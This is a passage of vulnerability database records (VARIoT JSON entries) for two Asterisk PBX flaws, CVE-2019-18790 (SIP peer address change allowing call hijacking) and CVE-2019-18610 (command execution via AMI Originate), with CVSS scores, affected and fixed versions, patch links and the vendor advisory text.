                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2020-03059",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "impactScore": 2.5,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.5,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2019-18790",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-18790",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-03059",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201911-1291",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service.         \n    Nature of Advisory  Denial of Service                                     \n      Susceptibility    Remote Unauthenticated Sessions                       \n         Severity       Minor                                                 \n      Exploits Known    No                                                    \n       Reported On      October 17, 2019                                      \n       Reported By      Andrey V. T.                                     \n    Modules Affected  channels/chan_sip.c                                     \n\n    Resolution  Using any other option value for \u201cnat\u201d will prevent the       \n                attack (such as \u201cnat=no\u201d or \u201cnat=force_rport\u201d), but will      \n                need to be tested on an individual basis to ensure that it    \n                works for the user\u2019s deployment. On the fixed versions of     \n                Asterisk, it will no longer set the address of the peer       \n                before authentication is successful when a SIP request comes  \n                in.                                                           \n\n                               Affected Versions       \n                         Product                       Release  \n                                                       Series   \n                  Asterisk Open Source                  13.x    All releases  \n                  Asterisk Open Source                  16.x    All releases  \n                  Asterisk Open Source                  17.x    All releases  \n                   Certified Asterisk                   13.21   All releases  \n\n                                  Corrected In                   \n                              Product                              Release    \n                       Asterisk Open Source                        13.29.2    \n                       Asterisk Open Source                        16.6.2     \n                       Asterisk Open Source                        17.0.1     \n                        Certified Asterisk                       13.21-cert5  \n\n                                     Patches                         \n                               SVN URL                                Revision   \n  http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff    Asterisk 13 \n  http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff    Asterisk 16 \n  http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff    Asterisk 17 \n  http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified   \n                                                                     Asterisk    \n                                                                     13.21-cert5 \n\n    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28589             \n\n    Asterisk Project Security Advisories are posted at                        \n    http://www.asterisk.org/security                                          \n                                                                              \n    This document may be superseded by later versions; if so, the latest      \n    version will be posted at                                                 \n    http://downloads.digium.com/pub/security/AST-2019-006.pdf and             \n    http://downloads.digium.com/pub/security/AST-2019-006.html                \n\n                                Revision History\n          Date          Editor                 Revisions Made                 \n    October 22, 2019   Ben Ford  Initial Revision                             \n    November 14, 2019  Ben Ford  Corrected and updated fields for             \n                                 versioning, and added CVE                    \n    November 21, 2019  Ben Ford  Added \u201cPosted On\u201d date                       \n\n               Asterisk Project Security Advisory - AST-2019-006\n               Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n  Permission is hereby granted to distribute and publish this advisory in its\n                           original, unaltered form",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "db": "PACKETSTORM",
            "id": "155434"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-18790",
            "trust": 3.1
          },
          {
            "db": "DLINK",
            "id": "SAP10005",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "155434",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.4526",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.4421",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "PACKETSTORM",
            "id": "155434"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ]
      },
      "id": "VAR-201911-0701",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:27:54.903000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "AST-2019-006",
            "trust": 0.8,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
          },
          {
            "title": "Security Advisories",
            "trust": 0.8,
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "title": "[SECURITY] [DLA 2017-1] asterisk security update",
            "trust": 0.8,
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
          },
          {
            "title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Denial of Service Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/196959"
          },
          {
            "title": "Sangoma Technologies Asterisk  and Sangoma Technologies Certified Asterisk Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=103433"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-862",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
          },
          {
            "trust": 1.6,
            "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
          },
          {
            "trust": 1.6,
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18790"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18790"
          },
          {
            "trust": 0.8,
            "url": "https://web.archive.org/web/20131208091355/http://securityadvisories.dlink.com/security/publication.aspx?name=sap10005"
          },
          {
            "trust": 0.6,
            "url": "https://seclists.org/fulldisclosure/2019/nov/18"
          },
          {
            "trust": 0.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
          },
          {
            "trust": 0.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
          },
          {
            "trust": 0.6,
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html   second message url unavailable at time of publishing"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
          },
          {
            "trust": 0.6,
            "url": "https://vigilance.fr/vulnerability/asterisk-information-disclosure-via-sip-peer-ip-address-change-30935"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
          },
          {
            "trust": 0.6,
            "url": "https://packetstormsecurity.com/files/155434/asterisk-project-security-advisory-ast-2019-006.html"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.digium.com/pub/security/ast-2019-006.html"
          },
          {
            "trust": 0.1,
            "url": "https://issues.asterisk.org/jira/browse/asterisk-28589"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-16.diff"
          },
          {
            "trust": 0.1,
            "url": "http://www.asterisk.org/security"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.diff"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-17.diff"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.21.diff"
          },
          {
            "trust": 0.1,
            "url": "http://downloads.digium.com/pub/security/ast-2019-006.pdf"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "PACKETSTORM",
            "id": "155434"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "PACKETSTORM",
            "id": "155434"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "date": "2019-12-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "date": "2019-11-21T23:02:22",
            "db": "PACKETSTORM",
            "id": "155434"
          },
          {
            "date": "2019-11-22T17:15:11.740000",
            "db": "NVD",
            "id": "CVE-2019-18790"
          },
          {
            "date": "2019-11-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-01-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "date": "2019-12-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "date": "2022-05-13T20:56:27.693000",
            "db": "NVD",
            "id": "CVE-2019-18790"
          },
          {
            "date": "2022-04-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Sangoma Asterisk and  Certified Asterisk Vulnerabilities related to lack of authentication",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201911-1169

    Vulnerability from variot - Updated: 2023-12-18 12:27

    An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more.

                               Affected Versions       
                         Product                       Release  
                                                       Series   
                  Asterisk Open Source                  13.x    All releases  
                  Asterisk Open Source                  16.x    All releases  
                  Asterisk Open Source                  17.x    All releases  
                   Certified Asterisk                   13.21   All releases
    
                                  Corrected In                   
                              Product                              Release    
                       Asterisk Open Source                        13.29.2    
                       Asterisk Open Source                        16.6.2     
                       Asterisk Open Source                        17.0.1     
                        Certified Asterisk                       13.21-cert5
    
                                     Patches                         
                               SVN URL                                Revision
    

    http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13 http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16 http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17 http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified
    Asterisk
    13.21-cert5

    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28580
    
    Asterisk Project Security Advisories are posted at                        
    http://www.asterisk.org/security
    
    This document may be superseded by later versions; if so, the latest      
    version will be posted at                                                 
    http://downloads.digium.com/pub/security/AST-2019-007.pdf and             
    http://downloads.digium.com/pub/security/AST-2019-007.html
    
                                Revision History
          Date            Editor                  Revisions Made              
    October 24, 2019   George Joseph  Initial Revision                        
    November 21, 2019  Ben Ford       Added “Posted On” date
    
               Asterisk Project Security Advisory - AST-2019-007
               Copyright © 2019 Digium, Inc. All Rights Reserved.
    

    Permission is hereby granted to distribute and publish this advisory in its original, unaltered form

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1169",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.0.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "17.0.1"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.21.0"
          },
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "17.0.0"
          },
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "16.0.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "debian",
            "version": "9.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "16.6.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "debian",
            "version": "8.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.29.2"
          },
          {
            "model": "gnu/linux",
            "scope": null,
            "trust": 0.8,
            "vendor": "debian",
            "version": null
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "digium",
            "version": "13.x"
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "digium",
            "version": "16.x"
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "digium",
            "version": "17.x"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "digium",
            "version": "13.21 to  13.21-cert4"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=13.*"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=16.*"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=17.*"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "13.21"
          },
          {
            "model": "certified asterisk 13.21-cert4",
            "scope": null,
            "trust": 0.6,
            "vendor": "sangoma",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "13.29.2",
                    "versionStartIncluding": "13.0.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "16.6.2",
                    "versionStartIncluding": "16.0.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "17.0.1",
                    "versionStartIncluding": "17.0.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "gjoseph",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "155435"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2019-18610",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-18610",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-03060",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-18610",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-18610",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-03060",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201911-1290",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012584"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18610"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1290"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
